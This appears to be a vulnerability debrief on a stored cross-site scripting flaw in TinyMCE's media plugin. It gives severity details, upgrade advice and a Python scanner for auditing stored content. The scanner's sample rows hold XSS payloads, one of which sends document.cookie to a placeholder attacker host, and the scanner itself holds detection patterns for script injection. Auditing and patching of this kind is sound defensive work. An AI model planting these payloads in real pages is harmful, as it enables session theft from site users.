PatchSiren

PatchSiren cyber security CVE debrief

CVE-2026-47761 tinymce CVE debrief

TinyMCE versions prior to 5.11.1, 7.9.3, and 8.5.1 contain a stored cross-site scripting (XSS) vulnerability in the media plugin. Attackers can inject malicious scripts through crafted data-mce-* attributes, which execute when content is rendered. This affects users with the media plugin enabled. The vulnerability was disclosed on 2026-05-28 and carries a HIGH severity CVSS score of 8.7.

Vendor
tinymce
Product
Unknown
CVSS
HIGH 8.7
CISA KEV
Not listed in stored evidence
Original CVE published
2026-05-28
Original CVE updated
2026-05-28
Advisory published
2026-05-28
Advisory updated
2026-05-28

Who should care

Organizations using TinyMCE with the media plugin enabled, particularly those accepting user-generated content or operating multi-user editorial workflows

Technical summary

The vulnerability exists in TinyMCE's media plugin, where insufficient sanitization of data-mce-* attributes allows attacker-controlled JavaScript to persist in stored content. When that content is later rendered, the injected script executes in the victim's browser context. The CVSS 3.1 vector CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:N reflects a network attack vector, low attack complexity, low privileges required (an account able to submit editor content), required user interaction (a victim must view the rendered content), and changed scope, with high impact to confidentiality and integrity and no impact to availability.

Defensive priority

HIGH

Recommended defensive actions

  • Upgrade TinyMCE to 5.11.1, 7.9.3, or 8.5.1 or later on your major version branch; the evidence notes place 6.x inside the affected 6.x-7.x range, so 6.x deployments need to move to 7.9.3 or later
  • Review stored content for data-mce-* attributes carrying script payloads and sanitize or quarantine matches; upgrading the editor does not remove payloads already persisted in the content store
  • Confirm whether the media plugin is actually loaded (it appears in the plugins option of the editor init) and consider disabling it until the patch is deployed
  • Audit application logs for suspicious content submissions made before the patch was deployed
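As an added example for the "review stored content" step above (illustrative audit code written for this debrief, not PatchSiren's or TinyMCE's own): a stdlib-only Python scanner that walks exported content rows and flags data-mce-* attributes whose decoded value, or whose name, looks like a script payload rather than editor bookkeeping. The attribute names in the sample rows (data-mce-object, data-mce-p-*) are modelled on the media plugin's placeholder naming, the payload shapes are constructed for illustration and are not the advisory's exploit vector, and the detection patterns are assumptions to tune against your own content.

```python
"""Scan stored TinyMCE content for data-mce-* attributes that carry script-like payloads.

Constructed audit example (stdlib only). Heuristics and sample rows are this
example's assumptions, not taken from the advisory.
"""
import re
from html.parser import HTMLParser
from typing import Dict, List, NamedTuple, Optional

# Value patterns that look like a payload rather than editor bookkeeping.
# Order matters: the first matching reason is the one reported.
SUSPICIOUS_VALUE_PATTERNS = [
    ("script-tag", re.compile(r"<\s*script\b", re.I)),
    ("javascript-url", re.compile(r"^\s*javascript\s*:", re.I)),
    ("html-data-url", re.compile(r"^\s*data\s*:\s*text/html", re.I)),
    ("inline-handler", re.compile(r"\bon[a-z]+\s*=", re.I)),
    ("embedded-markup", re.compile(r"<\s*(iframe|object|embed|svg|img)\b", re.I)),
]
# Attribute names that smuggle an event handler, e.g. data-mce-p-onload.
HANDLER_NAME = re.compile(r"^data-mce-(?:p-)?on[a-z]+$")


class Finding(NamedTuple):
    tag: str
    attr: str
    reason: str
    value: str  # decoded attribute value, truncated for reporting


def classify_value(value: str) -> Optional[str]:
    """Return the reason a data-mce-* attribute value looks malicious, or None."""
    for reason, pattern in SUSPICIOUS_VALUE_PATTERNS:
        if pattern.search(value):
            return reason
    return None


class _MceAttributeScanner(HTMLParser):
    """Collects findings for every data-mce-* attribute on every start tag.

    HTMLParser lower-cases attribute names and decodes entity references in
    attribute values, so an entity-encoded payload such as &lt;script&gt; is
    inspected in its decoded form, which is how a browser or editor sees it.
    """

    def __init__(self) -> None:
        super().__init__(convert_charrefs=True)
        self.findings: List[Finding] = []

    def handle_starttag(self, tag, attrs):
        for name, value in attrs:
            if not name.startswith("data-mce-"):
                continue
            decoded = value or ""
            reason = classify_value(decoded)
            if reason is None and HANDLER_NAME.match(name):
                reason = "handler-attribute-name"
            if reason:
                self.findings.append(Finding(tag, name, reason, decoded[:80]))


def scan_content(html: str) -> List[Finding]:
    """Scan one stored HTML fragment; return all findings (empty list if clean)."""
    scanner = _MceAttributeScanner()
    scanner.feed(html)
    scanner.close()
    return scanner.findings


def audit_records(records: Dict[str, str]) -> Dict[str, List[Finding]]:
    """Scan a mapping of record id -> stored HTML; return only records with findings."""
    flagged: Dict[str, List[Finding]] = {}
    for rid, html in records.items():
        hits = scan_content(html)
        if hits:
            flagged[rid] = hits
    return flagged


# Constructed sample rows standing in for a content-table export; not real data.
SAMPLE_RECORDS = {
    "post-1": '<p>Quarterly update <img src="/img/chart.png" alt="chart"></p>',
    "post-2": ('<img class="mce-object" data-mce-object="video" '
               'data-mce-p-src="https://cdn.example.com/clip.mp4" src="/img/placeholder.gif">'),
    "post-3": '<img data-mce-object="iframe" data-mce-p-src="javascript:alert(document.domain)">',
    "post-4": ('<img data-mce-object="video" '
               'data-mce-p-onloadstart="fetch(\'https://attacker.example/?c=\'+document.cookie)">'),
    "post-5": '<img data-mce-object="iframe" data-mce-p-srcdoc="&lt;script&gt;alert(1)&lt;/script&gt;">',
}

if __name__ == "__main__":
    for rid, hits in audit_records(SAMPLE_RECORDS).items():
        for hit in hits:
            print(f"{rid}: <{hit.tag} {hit.attr}> flagged as {hit.reason}: {hit.value!r}")
```

The scanner reports rather than rewrites, so a reviewer decides whether a flagged row is quarantined, re-serialized through a patched editor, or left alone; post-2 shows a benign placeholder that passes, while post-5 shows why the check must run on the entity-decoded value, since the raw database string never contains a literal <script>.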

Evidence notes

CVE published 2026-05-28; NVD status Analyzed; vendor advisory confirms patch availability; CPE ranges confirm affected versions across 5.x, 6.x-7.x, and 8.x branches

Official resources

2026-05-28T16:16:28.337Z